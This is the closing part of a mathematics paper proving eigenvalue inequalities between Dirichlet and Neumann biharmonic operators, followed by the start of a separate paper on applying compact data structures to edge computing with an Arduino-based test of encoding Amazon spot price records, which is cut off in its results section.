subspace._ Let \(k\in\mathbb{N}\) and let us fix the shorthand abbreviation \(\lambda=\lambda_{k}\) for the \(k\)-th eigenvalue of the biharmonic operator \(\mathsf{H}_{\mathrm{D}}\) on \(\Omega\) with Dirichlet boundary conditions. By the consequence (2.5) of the min-max principle there is a \(k\)-dimensional linear subspace \(\mathcal{L}_{\lambda}\) of \(H_{0}^{2}(\Omega)\) such that \[\mathfrak{h}_{\mathrm{D}}[u]\leq\lambda\|u\|_{L^{2}(\Omega)}^{2},\qquad\text{ for all }u\in\mathcal{L}_{\lambda}. \tag{3.1}\] Let the vectors \(\omega_{l}\in\mathbb{R}^{d}\), \(|\omega_{l}|^{4}=\lambda\), for \(l\in\{1,\ldots,d\}\) and the associated auxiliary functions \(v_{l}(x)=\sin(\omega_{l}\cdot x)\in H^{2}(\Omega)\), \(l\in\{1,\ldots,d\}\), be constructed as in Lemma 2.6 with \(\lambda\) being, as above, the \(k\)-th eigenvalue of the Dirichlet biharmonic operator. Recall also that the functions \(\{v_{l}\}_{l=1}^{d}\) are constructed to be mutually orthogonal in \(L^{2}(\Omega)\). Consider the linear subspace of \(H^{2}(\Omega)\) defined by \[\mathcal{M}:=\mathcal{L}_{\lambda}+\operatorname{span}\{v_{1},v_{2},\ldots,v_ {d}\}. \tag{3.2}\] In order to show that \(\dim\mathcal{M}=k+d\) we need to verify that \[\mathcal{L}_{\lambda}\cap\operatorname{span}\{v_{1},v_{2},\ldots,v_{d}\}=\{0\}.\] A generic element of \(\mathcal{L}_{\lambda}\cap\operatorname{span}\{v_{1},v_{2},\ldots,v_{d}\}\) is given by \[w=\sum_{l=1}^{d}c_{l}v_{l}\] with some complex coefficients \(\{c_{l}\}_{l=1}^{d}\) and satisfies \(w\in\mathcal{L}_{\lambda}\subset H_{0}^{2}(\Omega)\). Using the definition of the functions \(\{v_{l}\}_{l=1}^{d}\) we get for any \(x\in\Omega\) by a direct computation \[(-\Delta w)(x) =-\sum_{l=1}^{d}c_{l}\Delta(\sin(\omega_{l}\cdot x))\] \[=\sum_{l=1}^{d}|\omega_{l}|^{2}c_{l}\sin(\omega_{l}\cdot x)= \sqrt{\lambda}\sum_{l=1}^{d}c_{l}v_{l}(x)=\sqrt{\lambda}w(x).\] Thus, we have \(w\in H_{0}^{2}(\Omega)\) and \(-\Delta w=\sqrt{\lambda}w\) and by Lemma 2.3 we infer that \(w\equiv 0\). _Step 2: application of the min-max principle._ Recall that \(\mathcal{M}\) is a linear subspace of \(H^{2}(\Omega)\) with \(\dim\mathcal{M}=k+d\) constructed in the previous step of the proof. Let \(v\in\mathcal{M}\) be arbitrary. The function \(v\) is represented by \[v=u+\sum_{l=1}^{d}c_{l}v_{l},\] with a certain function \(u\in\mathcal{L}_{\lambda}\) and some complex coefficients \(\{c_{l}\}_{l=1}^{d}\). Plugging the function \(v\) into the quadratic form \(\mathfrak{h}_{\mathrm{N}}\) of the biharmonic operator \(\mathsf{H}_{\mathrm{N}}\) with Neumann boundary conditions we get \[\mathfrak{h}_{\mathrm{N}}[v]=\sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)} ^{2}+2\mathrm{Re}\,\left\{\sum_{i,j=1}^{d}\sum_{l=1}^{d}\left(\partial_{ij}u, c_{l}\partial_{ij}v_{l}\right)_{L^{2}(\Omega)}\right\}+\sum_{i,j=1}^{d}\Big{\|} \sum_{l=1}^{d}c_{l}\partial_{ij}v_{l}\Big{\|}_{L^{2}(\Omega)}^{2}. \tag{3.3}\] We analyse the three terms on the right hand side of the above equation separately. By (3.1) we get that \[\sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)}^{2}\leq\lambda\|u\|_{L^{2}( \Omega)}^{2}. \tag{3.4}\] Notice that \(\partial_{j}u\in H^{1}_{0}(\Omega)\) for any \(j\in\{1,2,\ldots,d\}\). Hence, we can apply the integration by parts formula in [1, Theorem 1.5.3.1] twice to get \[\begin{split}\sum_{i,j=1}^{d}\sum_{l=1}^{d}\left(\partial_{ij}u,c_{l}\partial_{ij}v_{l}\right)_{L^{2}(\Omega)}\!=&-\sum_{i,j=1} ^{d}\sum_{l=1}^{d}\left(\partial_{j}u,c_{l}\partial_{i}\partial_{ij}v_{l} \right)_{L^{2}(\Omega)}\!=\!\sum_{i,j=1}^{d}\sum_{l=1}^{d}\left(u,c_{l} \partial_{ij}\partial_{ij}v_{l}\right)_{L^{2}(\Omega)}\\ &=\sum_{l=1}^{d}\sum_{i,j=1}^{d}\overline{c_{l}}\left(u,\omega_{l,i}^{2}\omega_{l,j}^{2}v_{l}\right)_{L^{2}(\Omega)}=\lambda\sum_{l=1}^{d} \overline{c_{l}}(u,v_{l})_{L^{2}(\Omega)},\end{split} \tag{3.5}\] where we used the notation \(\omega_{l}=(\omega_{l,1},\omega_{l,2},\ldots,\omega_{l,d})^{\top}\) for \(l\in\{1,2,\ldots,d\}\) and applied that \(|\omega_{l}|^{4}=\lambda\) in the last step. For the last term in (3.3) we obtain employing mutual orthogonality of \(\{v_{l}\}_{l=1}^{d}\) in \(L^{2}(\Omega)\) that \[\begin{split}\sum_{i,j=1}^{d}\Big{\|}\sum_{l=1}^{d}c_{l} \partial_{ij}v_{l}\Big{\|}_{L^{2}(\Omega)}^{2}&=\sum_{i,j=1}^{d} \Big{\|}-\sum_{l=1}^{d}c_{l}\omega_{l,i}\omega_{l,j}v_{l}\Big{\|}_{L^{2}(\Omega )}^{2}=\sum_{l=1}^{d}\sum_{i,j=1}^{d}\omega_{l,i}^{2}\omega_{l,j}^{2}|c_{l}|^{ 2}\|v_{l}\|_{L^{2}(\Omega)}^{2}\\ &=\lambda\sum_{l=1}^{d}|c_{l}|^{2}\|v_{l}\|_{L^{2}(\Omega)}^{2}= \lambda\Big{\|}\sum_{l=1}^{d}c_{l}v_{l}\Big{\|}_{L^{2}(\Omega)}^{2},\end{split} \tag{3.6}\] where we used that \(|\omega_{l}|^{4}=\lambda\) for all \(l\in\{1,2,\ldots,d\}\) in between. Combining (3.3) with (3.4), (3.5), and (3.6) we obtain that \[\begin{split}\mathfrak{h}_{\mathrm{N}}[v]&\leq \lambda\|u\|_{L^{2}(\Omega)}^{2}+2\lambda\mathrm{Re}\,\left\{\left(u,\sum_{l=1} ^{d}c_{l}v_{l}\right)_{L^{2}(\Omega)}\right\}+\lambda\Big{\|}\sum_{l=1}^{d}c_{ l}v_{l}\Big{\|}_{L^{2}(\Omega)}^{2}\\ &=\lambda\Big{\|}u+\sum_{l=1}^{d}c_{l}v_{l}\Big{\|}_{L^{2}(\Omega )}^{2}=\lambda\|v\|_{L^{2}(\Omega)}^{2}.\end{split}\] Finally, taking into account that \(\dim\mathcal{M}=k+d\), we get from the inequality \(\mathfrak{h}_{\mathrm{N}}[v]\leq\lambda\|v\|_{L^{2}(\Omega)}^{2}\) valid for any \(v\in\mathcal{M}\) combined with the min-max characterisation (2.4) for the eigenvalues of the biharmonic operator with Neumann boundary conditions that \(\mu_{k+d}\leq\lambda_{k}\) for any \(k\in\mathbb{N}\). ## 4. **Proof of Theorem 1.2** Recall that in the assumptions of the theorem the bounded connected Lipschitz domain \(\Omega\subset\mathbb{R}^{d}\) is such that \(\mathsf{J}_{l}(\Omega)=\Omega\) for all \(l\in\{2,\ldots,d\}\), where the mappings \(\mathsf{J}_{l}\) are defined in (1.4). The proof of this theorem relies on the same technique as the proof of Theorem 1.1 and we again divide the argument into two steps, where in the first step we construct a subspace of trial functions and in the second step we use this subspace together with the min-max principle. _Step 1: construction of a trial subspace._ As in the proof of Theorem 1.1, let \(k\in\mathbb{N}\) and let us fix the shorthand abbreviation \(\lambda=\lambda_{k}\) for the \(k\)-th eigenvalue of the biharmonic operator on \(\Omega\) with Dirichlet boundary conditions. As before by the consequence (2.5) of the min-max principle there is a \(k\)-dimensional linear subspace \(\mathcal{L}_{\lambda}\) of \(H^{2}_{0}(\Omega)\) such that \[\mathfrak{h}_{\mathrm{D}}[u]\leq\lambda\|u\|_{L^{2}(\Omega)}^{2},\qquad\text{ for all }u\in\mathcal{L}_{\lambda}. \tag{4.1}\] Let us fix \(\omega:=\lambda^{1/4}>0\) (scalar) and introduce the following \(d+1\) functions in the Sobolev space \(H^{2}(\Omega)\) \[v_{0}(x):=\sin(\omega x_{1}),\quad v_{1}(x):=\cos(\omega x_{1})\qquad\text{ and}\qquad v_{l}(x):=\sin(\omega x_{l}),\quad l\in\{2,\dots,d\}. \tag{4.2}\] We claim that the functions \(\{v_{0},v_{1},\dots v_{d}\}\) are linearly independent. Indeed, suppose that for some complex numbers \(\{c_{l}\}_{l=0}^{d}\) we have the relation \[\sum_{l=0}^{d}c_{l}v_{l}(x)=0.\] Differentiating the above identity with respect to \(x_{l}\) for all \(l\in\{1,2,\dots,d\}\) we get that for any \(x=(x_{1},\dots x_{d})\in\Omega\) there holds \[c_{0}\cos(\omega x_{1})-c_{1}\sin(\omega x_{1})=0\qquad\text{and}\qquad c_{l} \cos(\omega x_{l})=0\quad\text{for all }l\in\{2,\dots,d\}.\] Thus, we conclude by simple algebraic reasons that \(c_{l}=0\) for all \(l\in\{0,1,\dots,d\}\). Next, we show that the functions \(\{v_{l}\}_{l=0}^{d}\) satisfy certain orthogonality properties in \(L^{2}(\Omega)\). It follows from the symmetries of the domain \(\Omega\) that for any \(l\in\{2,\dots,d\}\) there holds \[(v_{0},v_{l})_{L^{2}(\Omega)}=\int_{\Omega}\sin(\omega x_{1})\sin(\omega x_{l })\,\mathrm{d}x=\int_{\Omega}\sin(\omega y_{1})\sin(-\omega y_{l})\,\mathrm{d }y=-(v_{0},v_{l})_{L^{2}(\Omega)},\] where we performed the change of variables \(x=\mathfrak{J}_{l}y\) in the integral and used that \(\mathfrak{J}_{l}(\Omega)=\Omega\). Hence, we obtain the following orthogonality property \[(v_{0},v_{l})_{L^{2}(\Omega)}=0,\qquad\text{for all }l\in\{2,\dots,d\}. \tag{4.3}\] Analogously we arrive at the orthogonality properties \[(v_{1},v_{l})_{L^{2}(\Omega)}=0,\qquad\text{for all }\,l\in\{2, \dots,d\}, \tag{4.5}\] \[(v_{i},v_{j})_{L^{2}(\Omega)}=0,\qquad\text{for all }i,j\in\{2, \dots,d\},\ i\neq j. \tag{4.4}\] We also remark that the functions \(v_{0}\) and \(v_{1}\) are, in general, not orthogonal in \(L^{2}(\Omega)\). Their orthogonality is not needed for the argument. Let us consider the linear subspace of \(H^{2}(\Omega)\) defined by \[\mathcal{K}:=\mathcal{L}_{\lambda}+\operatorname{span}\{v_{0},v_{1},\dots,v_{ d}\}.\] In order to show that \(\dim\mathcal{K}=k+d+1\) it suffices to check that \[\mathcal{L}_{\lambda}\cap\operatorname{span}\{v_{0},v_{1},\dots,v_{d}\}=\{0\}.\] A generic element of \(\mathcal{L}_{\lambda}\cap\operatorname{span}\{v_{0},v_{1},\dots,v_{d}\}\) is given by \[w=\sum_{l=0}^{d}c_{l}v_{l}\] with some complex coefficients \(\{c_{l}\}_{l=0}^{d}\) and satisfies \(w\in\mathcal{L}_{\lambda}\subset H^{2}_{0}(\Omega)\). By the choice of the functions \(\{v_{l}\}_{l=0}^{d}\) we have \(-\Delta w=\sqrt{\lambda}w\). Thus, taking into account that \(w\in H^{2}_{0}(\Omega)\) we infer by Lemma 2.3 that \(w\equiv 0\). _Step 2: application of the min-max principle._ Recall that \(\mathcal{K}\) is a linear subspace of \(H^{2}(\Omega)\) with \(\dim\mathcal{K}=k+d+1\) constructed in the previous step of the proof. Let \(v\in\mathcal{K}\) be arbitrary. The function \(v\) is represented by \[v=u+\sum_{l=0}^{d}c_{l}v_{l},\] with a certain function \(u\in\mathcal{L}_{\lambda}\) and some complex coefficients \(\{c_{l}\}_{l=0}^{d}\). Plugging the function \(v\) into the quadratic form \(\mathfrak{h}_{\mathrm{N}}\) of the biharmonic operator \(\mathsf{H}_{\mathrm{N}}\) with Neumann boundary conditions we get \[\mathfrak{h}_{\mathrm{N}}[v]=\sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega) }^{2}+2\mathrm{Re}\,\left\{\sum_{i,j=1}^{d}\sum_{l=0}^{d}\left(\partial_{ij}u, c_{l}\partial_{ij}v_{l}\right)_{L^{2}(\Omega)}\right\}+\sum_{i,j=1}^{d}\bigg{\|} \sum_{l=0}^{d}c_{l}\partial_{ij}v_{l}\bigg{\|}_{L^{2}(\Omega)}^{2}. \tag{4.6}\] We recall that by (3.1) there holds \[\sum_{i,j=1}^{d}\|\partial_{ij}u\|_{L^{2}(\Omega)}^{2}\leq\lambda\|u\|_{L^{2}( \Omega)}^{2}. \tag{4.7}\] Notice that \(\partial_{j}u\in H^{1}_{0}(\Omega)\) for any \(j\in\{1,2,\ldots,d\}\). Using the explicit form of the function \(\{v_{l}\}_{l=0}^{d}\) in (4.2) and applying the integration by parts formula [13, Theorem 1.5.3.1] we get \[\begin{split}\sum_{i,j=1}^{d}\sum_{l=0}^{d}\left(\partial_{ij}u,c_{l}\partial_{ij}v_{l}\right)_{L^{2}(\Omega)}&=\left(\partial _{1}^{2}u,c_{0}\partial_{1}^{2}v_{0}+c_{1}\partial_{1}^{2}v_{1}\right)_{L^{2}( \Omega)}+\sum_{l=2}^{d}\left(\partial_{l}^{2}u,c_{l}\partial_{l}^{2}v_{l} \right)_{L^{2}(\Omega)}\\ &=\left(u,c_{0}\partial_{1}^{2}\partial_{1}^{2}v_{0}+c_{1} \partial_{1}^{2}\partial_{1}^{2}v_{1}\right)_{L^{2}(\Omega)}+\sum_{l=2}^{d} \left(u,c_{l}\partial_{l}^{2}\partial_{l}^{2}v_{l}\right)_{L^{2}(\Omega)}\\ &=\omega^{4}(u,c_{0}v_{0}+c_{1}v_{1})_{L^{2}(\Omega)}+\omega^{4} \sum_{l=2}^{d}(u,c_{l}v_{l})_{L^{2}(\Omega)}\\ &=\lambda\sum_{l=0}^{d}\overline{c_{l}}(u,v_{l})_{L^{2}(\Omega)},\end{split} \tag{4.8}\] where we employed that \(\lambda=\omega^{4}\); here we use the abbreviation \(\partial_{i}^{2}u=\frac{\partial^{2}u}{\partial x_{i}^{2}}\), \(i\in\{1,2,\ldots,d\}\). For the last term in (4.6) we obtain employing the explicit form of the functions \(\{v_{l}\}_{l=0}^{d}\) in (4.2) and the orthogonality properties (4.3), (4.4) and (4.5) that \[\begin{split}\sum_{i,j=1}^{d}\bigg{\|}\sum_{l=0}^{d}c_{l}\partial _{ij}v_{l}\bigg{\|}_{L^{2}(\Omega)}^{2}&=\|c_{0}\partial_{1}^{2} v_{0}+c_{1}\partial_{1}^{2}v_{1}\|_{L^{2}(\Omega)}^{2}+\sum_{l=2}^{d}|c_{l}|^{2} \|\partial_{l}^{2}v_{l}\|_{L^{2}(\Omega)}^{2}\\ &=\omega^{4}\|c_{0}v_{0}+c_{1}v_{1}\|_{L^{2}(\Omega)}^{2}+\omega^ {4}\sum_{l=2}^{d}|c_{l}|^{2}\|v_{l}\|_{L^{2}(\Omega)}^{2}\\ &=\lambda\bigg{\|}\sum_{l=0}^{d}c_{l}v_{l}\bigg{\|}_{L^{2}( \Omega)}^{2},\end{split} \tag{4.9}\] where we used that \(\omega^{4}=\lambda\) in between. Combining (4.6) with (4.7), (4.8), and (4.9) we obtain that \[\begin{split}\mathfrak{h}_{\mathrm{N}}[v]&\leq\lambda \|u\|_{L^{2}(\Omega)}^{2}+2\lambda\mathrm{Re}\,\left\{\left(u,\sum_{l=0}^{d}c_ {l}v_{l}\right)_{L^{2}(\Omega)}\right\}+\lambda\bigg{\|}\sum_{l=0}^{d}c_{l}v_ {l}\bigg{\|}_{L^{2}(\Omega)}^{2}\\ &=\lambda\bigg{\|}u+\sum_{l=0}^{d}c_{l}v_{l}\bigg{\|}_{L^{2}( \Omega)}^{2}=\lambda\|v\|_{L^{2}(\Omega)}^{2}.\end{split}\] Finally, taking into account that \(\dim\mathcal{K}=k+d+1\), we derive from the inequality \(\mathfrak{h}_{\mathrm{N}}[v]\leq\lambda\|v\|_{L^{2}(\Omega)}^{2}\) valid for any \(v\in\mathcal{K}\) combined with the min-max characterisation (2.4) for the eigenvalues of the biharmonic operator with Neumann boundary conditions that \(\mu_{k+d+1}\leq\lambda_{k}\) for any \(k\in\mathbb{N}\). **Acknowledgement** The author gratefully acknowledges the support by the grant No. 21-07129S of the Czech Science Foundation.
2306.01074
When Edge Computing Meets Compact Data Structures
Edge computing enables data processing and storage closer to where the data are created. Given the largely distributed compute environment and the significantly dispersed data distribution, there are increasing demands of data sharing and collaborative processing on the edge. Since data shuffling can dominate the overall execution time of collaborative processing jobs, considering the limited power supply and bandwidth resource in edge environments, it is crucial and valuable to reduce the communication overhead across edge devices. Compared with data compression, compact data structures (CDS) seem to be more suitable in this case, for the capability of allowing data to be queried, navigated, and manipulated directly in a compact form. However, the relevant work about applying CDS to edge computing generally focuses on the intuitive benefit from reduced data size, while few discussions about the challenges are given, not to mention empirical investigations into real-world edge use cases. This research highlights the challenges, opportunities, and potential scenarios of CDS implementation in edge computing. Driven by the use case of shuffling-intensive data analytics, we proposed a three-layer architecture for CDS-aided data processing and particularly studied the feasibility and efficiency of the CDS layer. We expect this research to foster conjoint research efforts on CDS-aided edge data analytics and to make wider practical impacts.
Zheng Li, Diego Seco, José Fuentes-Sepúlveda
2023-06-01T18:22:59Z
http://arxiv.org/abs/2306.01074v1
# When Edge Computing Meets Compact Data Structures ###### Abstract Edge computing enables data processing and storage closer to where the data are created. Given the largely distributed compute environment and the significantly dispersed data distribution, there are increasing demands of data sharing and collaborative processing on the edge. Since data shuffling can dominate the overall execution time of collaborative processing jobs, considering the limited power supply and bandwidth resource in edge environments, it is crucial and valuable to reduce the communication overhead across edge devices. Compared with data compression, compact data structures (CDS) seem to be more suitable in this case, for the capability of allowing data to be queried, navigated, and manipulated directly in a compact form. However, the relevant work about applying CDS to edge computing generally focuses on the intuitive benefit from reduced data size, while few discussions about the challenges are given, not to mention empirical investigations into real-world edge use cases. This research highlights the challenges, opportunities, and potential scenarios of CDS implementation in edge computing. Driven by the use case of shuffling-intensive data analytics, we proposed a three-layer architecture for CDS-aided data processing and particularly studied the feasibility and efficiency of the CDS layer. We expect this research to foster conjoint research efforts on CDS-aided edge data analytics and to make wider practical impacts. collaborative data analytics; communication overhead; compact data structure; data shuffling; edge computing ## I Introduction Edge computing is a modern distributed computing paradigm that brings data processing and storage closer to the network edge where the data are generated. Given the pervasive and heterogeneous edge and user devices, both the deployment environment and the runtime topology can be more distributed than ever for edge applications [1]. Correspondingly, it has been envisioned that the demands of data sharing and collaborative processing will dramatically increase on the edge [2]. For example, in the field of edge intelligence, to label cross-region data for training AI models, the preprocessing of distributed raw data will be needed by employing data-parallel frameworks like MapReduce [3]. It should be noted that the data-parallel processing can be data-shuffling intensive. In cluster computing, the data shuffling between computation stages accounts for more than half of the completion times of MapReduce and Dryad jobs [4]. In Amazon cloud, data communication at the shuffling stage can even take up to 70% of the overall execution time of self-join applications [5]. Considering the limited power supply for wireless equipment and the limited bandwidth resource in the edge environments, such excessive communication loads will inevitably lead to threats not only to the time critical requirement of edge computing but also to the battery life of edge devices. Therefore, it is crucial and valuable to investigate practical approaches to reducing the communication overhead in edge data analytics. A straightforward strategy of reducing the amount of data that need to be transmitted over a network is to employ data compression techniques [6]. However, this strategy is mainly suitable for one-off data transmission scenarios, as data decompression is generally required to utilize the compressed data, no matter in case of lossy compression or lossless compression. When it comes to shuffling-intensive data analytics, the extremely frequent data compression and decompression will explosively increase the computation workloads, which will not pay off the reduced communication overhead. Compared with data compression, the techniques of compact data structures (CDS) can not only maintain data with less space, but they also enable the data to be queried, navigated, and manipulated directly in their compact form, i.e. without being decompressed [7]. Such a decompression-free feature makes CDS particularly promising to fit in the scenario of space-sensitive data analytics. As a matter of fact, CDS techniques have been successfully applied to many big data areas (e.g., bioinformatics [8]). However, there exist various challenges in applying CDS to edge computing. For example, despite the reduced data size, the construction of CDS is still space hungry, which may not be affordable for resource-limited devices. Although the edge computing community has noticed and recognized the benefits of CDS, the current discussions about employing CDS techniques are superficial and ad hoc [9], not to mention the lack of empirical experience reports and case studies. To help gain deeper understanding of, and obtain the first-hand experience in, applying CDS to edge computing, we firstly brainstormed a set of challenges and opportunities in practice, and then adopted Arduino YUN Rev2 as a representative edge device to investigate CDS-aided data analytics implementations. This paper reports our current work with a twofold contribution. * For researchers, our discussions about the challenges and opportunities of applying CDS to edge computing can act as a bridge between these two communities, to foster conjoint research efforts on the topic of CDS-aided edge data analytics. * For practitioners, our empirical study demonstrates the feasibility and potential efficiency of implementing CDS-aided edge data analytics. The three-layer architecture proposed in our study can be adapted to more use cases on the edge. The remainder of this paper is organized as follows. Section II summarizes our brainstormed challenges, opportunities, and two main implementation scenarios of applying CDS to edge computing. Section III describes our empirical study that mainly focuses on the CDS layer at this current stage. Conclusions are drawn in Section IV together with our future work plans. ## II Challenges and Opportunities of Applying CDS to Edge Computing ### _Major Challenges_ Although the benefit from compact while still operable data is intuitively straightforward, applying CDS to edge computing may have various challenges in practice. * **The construction of CDS is space hungry.** As a cost of enabling data operations in the reduced space, extra runtime space is needed for constructing CDS. Despite active research efforts in the last few years, many CDS require a large construction space (that may be tremendously larger than the constructed results). Given those IoT devices with limited storage capabilities (e.g., the embedded RAM is only 4KB for current taxi-mounted GPS devices), the construction of CDS will be one of the top challenges on the edge. * **The dynamism of CDS construction increases the computational complexity.** To address the space limit, an alternative strategy is to dynamically construct CDS via update operations for chunk-by-chunk datasets. Take our empirical study as an example (cf. Section III-A), instead of constructing and maintaining a full dictionary to encode data, we can let edge devices build up and continuously update a dictionary subset for data encoding. Unfortunately, this strategy will inevitably increase the computing overhead on the edge. Moreover, although CDS aims to eliminate as much redundancy as possible, such a CDS dynamism requires redundant information to allow update operations and to make dynamic CDS constructions compatible with each other. In fact, it has been revealed that the dynamic versions of typical CDS techniques do not achieve more remarkable performance than their static versions [7]. * **Distributed CDS constructions may incur CDS inconsistency issues.** Given the largely dispersed data distribution on the edge, CDS constructions should also be arranged on distributed edge devices, in order collaboratively to satisfy the needs of compact data consumption. When heterogeneous data and dynamism are involved in the distributed CDS constructions, the update operations can make the constructed CDS inconsistent on different edge devices. To our best knowledge, this challenge has not been well studied even in the CDS community. A possible solution is to develop a CDS transmission mechanism. One device can transmit its CDS (or a part of it via split/filter operation) to another device, or even to a centralized CDS server. The receivers will be able to merge different CDS versions and synchronize the others with a consolidated version. ### _Promising Opportunities_ As long as CDS is implementable on suitable edge devices (by tolerating, bypassing, relieving or addressing the aforementioned challenges), we argue that it can bring at least two main benefits to edge computing, as explained below. * **Reducing the communication overhead in shuffling-intensive edge data analytics.** Data shuffling is a crucial component in collaborative data analytics across multiple compute nodes (e.g., MapReduce). As mentioned previously, data communication at the shuffling stage can dominate the overall execution time of distributed computing jobs [4, 5]. However, such a communication overhead can result in violations of the low-latency requirements of edge computing. In fact, it has been identified that data shuffling has become a bottleneck for edge data analytics [10]. By applying CDS, the largely reduced data size will significantly reduce the communication overhead of data shuffling. It should be noted that the data compression techniques could not be applicable in this case, as data shuffling always comes with intermediate data processing, while the compressed data would not be able to be processed directly. * **Extending the battery life of edge devices.** Unless using wired power supply, the usage of edge devices is mainly constrained by their battery capacities, while there is still a tremendous gap between battery technologies and power requirements due to the inherent complexity in the relevant interdisciplinary topics (e.g., thermodynamics and fluid mechanics) [11]. Meanwhile, given the massively growing IoT and the increasing popularity of over-the-top mobile applications (e.g., instant messaging), signaling energy consumption has become a major concern on the edge [12]. Therefore, the data transmission among edge devices should take into account not only offering high throughput and low latency, "but also conserving precious battery energy to prolong operational lifetime" [13]. Considering the benefit of maintaining the same data usability after reducing the data size, CDS-aided data transmission can be a promising strategy to extend the battery life of relevant edge devices. ### _Potential Implementation Scenarios_ When it comes to practically implementing CDS techniques on edge devices, we distinguish between two main implementation scenarios. * **Static CDS based on prior knowledge.** In this case, the CDS can be constructed in advance based on pre-known regular patterns or domain-specific knowledge, and correspondingly the compact counterpart of the original data form will have been predefined. At runtime, the constructed CDS can act as a static transformer to convert original data to their compact versions seamlessly. This scenario is exemplified by a pre-established lookup table in our empirical study (cf. Section III-A). * **Dynamic CDS based on runtime knowledge.** In this case, the prerequisite information for constructing CDS is unavailable until the data to be converted are received at runtime, and frequent CDS reconstructions may be needed due to possibly continuous information updates (e.g., the price distribution of Amazon's spot service). It is clear that such a scenario would also suffer from the dynamism challenge of CDS construction, although we could employ buffers to facilitate the storage of new data and the reconstruction of CDS. In practice, a possible workaround is to accumulate and take advantage of the posterior knowledge (e.g., the price distribution may exist only in a limited range), to reduce the frequency of CDS reconstruction. ## III An Empirical Investigation Instead of arguing specific CDS techniques (e.g., bitvectors, wavelet trees, \(k\)-page graph, etc.) [7], this research aims to bring us empirical experience in applying CDS to edge computing in a generic sense. Therefore, we decided to firstly propose a generic edge computing scenario that involves CDS, in order to better drive our experimental investigation. In this scenario, we design a three-layer architecture for conducting suitable data analytic tasks at the edge side, as illustrated in Figure 1. In detail, while receiving raw data, edge devices at the first layer choose suitable CDS techniques to transform the raw data, and continuously feed the second layer with data in a compact form. A group of second-layer devices perform data analytics in a collaborative and distributed manner, without even being aware of the original data form. Depending on the requirement, the data analytical results can be output directly or be switched back to the plain form. Thus, the third layer is optional in case the reverse data transformation is needed. As for the data analytic tasks, we refer to our previous work on characterizing Amazon's spot service pricing [14]. Naturally, the whole system will need to be re-implemented and deployed in the edge environment. More importantly, the workflow will need to be adapted to the three-layer architecture designed in this research, and using compact price records instead of original price history to realize the characterization. Driven by the aforementioned concerns about edge resource constraints when applying CDS, we only focus on the first layer in this paper. ### _Selecting Suitable CDS Techniques_ Given the spot service prices downloadable from Amazon (each record includes the tag, price, timestamp, instance type, operating system, and AWS zone, as exemplified in Figure 2), we see four strategies to make the original data compact, such as: * **Filtering out redundant data components.** In the context of spot service, the price record tag "SPOTINSTANCEPRICE" never changes, and the last two digits of the prices are always 0. Thus, we can directly ignore them when reading the data. Since Amazon adopts UTC by default [15], the UTC offset part (i.e. "+0000") of the timestamp can also be removed. * **Delta encoding data via differential compression.** The differential strategy is widely shared between compression techniques and CDS techniques. In our case study, this strategy is particularly suitable to reduce the size of continuous timestamps. By setting a base timestamp, the following timestamps can be represented as their differences against the base one. In practice, multiple base timestamps with suitable intervals can be used to control the maximum time difference. Figure 1: The three-layer architecture for CDS-aided edge data analytics. (_Each blue rectangular indicates an edge device._) * **Using prior knowledge to encode data.** Amazon defines its unique service (EC2) instances via a composite key that is made up of instance type, operating system and AWS zone. There three attributes all have fixed amounts of values (i.e. 402 types, eight systems, and 56 zones respectively) [15]. Benefiting from this prior knowledge, we can encode those unique service instances (e.g., into Huffman codes), and then store the codes in bitvectors. * **Using posterior knowledge to encode data.** Although the spot pricing mechanism delivers dynamic prices at runtime, each service instance's price varies only in a limited range. Considering that the pricing characterization will deliver a price distribution (as demonstrated in [14]), after data analytics, we can utilize the price distribution to further encode the price numbers and in turn improve the CDS efficiency in future characterization work. The first two strategies are straightforward to implement. Particularly, to make the demonstration reader-friendly in this paper, we still keep the base timestamps in the human-readable format. In contrast, since the data analytics layer is out of our current research scope, the fourth strategy is not implemented in this study. When implementing the third strategy, for the purpose of conciseness and for the ease of replication, we decided to use sequential numbers instead of binary codes to represent and integrate the available information of instance types, operating systems and AWS zones. In fact, there is always a CDS trade-off between "good space performance of bitwise codes and the good time performance of bytewise codes" [7]. Eventually, we established a lookup table for Arduino YUN Rev2 to encode incoming data. ### _Setting Up the Testbed_ By sticking to the CDS layer, our experimental logic is focused on an edge device that can receive plain spot prices and transmit out their compact version. Accordingly, we follow the client-server model to architect and build up the testbed, as shown in Figure 3 and explained below. * **A Wireless Router:** We work in a stable WiFi environment via a TP-Link Realtek RTL8821CE 802.11ac PCIe Adapter that transmits and receives data on the frequency 2.4 GHz and at the speed 150 Mbps. * **An Arduino YUN Rev2:** To represent typical edge device features, we choose an Arduino YUN Rev2 that has built-in Ethernet and WiFi support. In particular, we intentionally utilize its limited storage and compute capacities by sticking to its native sketch side for all the experiments. Correspondingly, the aforementioned CDS strategies are implemented as Arduino sketch program. * **An HTTP Server:** Since the sketch side of Arduino YUN Rev2 does not have enough power to handle HTTPS connections, we set up a simple HTTP server on a Windows 10 desktop to simulate the data source, by hosting various sizes of Amazon's spot service pricing history files. * **A Client:** To facilitate our observations and measurements, we issue data requests through a client Python program deployed on a Windows 10 laptop. Each client request triggers a cascade Arduino request to the HTTP server, while the eventual response will be the CDS processing results instead of the raw data. Figure 3: The testbed used in our experimental investigation. Figure 2: Original spot service price records downloadable from Amazon. The columns from left to right are: Tag, Price, Timestamp, Instance Type, Operating System, AWS Zone. ### _Experimental Design and Implementation_ Since the resource limit is the major concern for applying CDS on edge devices (cf. Section II), we have prepared a set of data files ranging from 5 to 1000 price records to try gradually squeezing the capacity of Arduino YUN Rev2. For each data file hosted on the HTTP server, we issue multiple requests and measure the average wall-clock latency from the client. In particular, the data processing latencies on Arduino YUN Rev2 are measured via the sketch code millis(); and also returned to the client. It should be noted that both the cascade request time and the response time have been excluded from the measurement of data processing latency. The data processing here is to apply the CDS strategies to the original price records, as discussed in Section III-A. To improve the replicability of this research, we share the source files online1 and describe the main steps as follows. Footnote 1: [https://www.doi.org/10.5281/zenodo.5149326](https://www.doi.org/10.5281/zenodo.5149326) 1. Launch the HTTP server, and keep note of the server's IP address and port number. 2. Update the read_file() function in the sketch code with the noted IP address and port number. 3. Power on Arduino YUN Rev2 and upload the updated sketch code to it. 4. Inject the pre-established lookup table as key-value pairs to Arduino YUN Rev2. 5. Issue client requests to obtain spot price data and latency measurement results. ### _Experimental Results and Analyses_ After going through the CDS conversion, the original price records demonstrated in Figure 2 will become as compact as shown in Figure 4. Due to the known timeout issue2, in our tests, 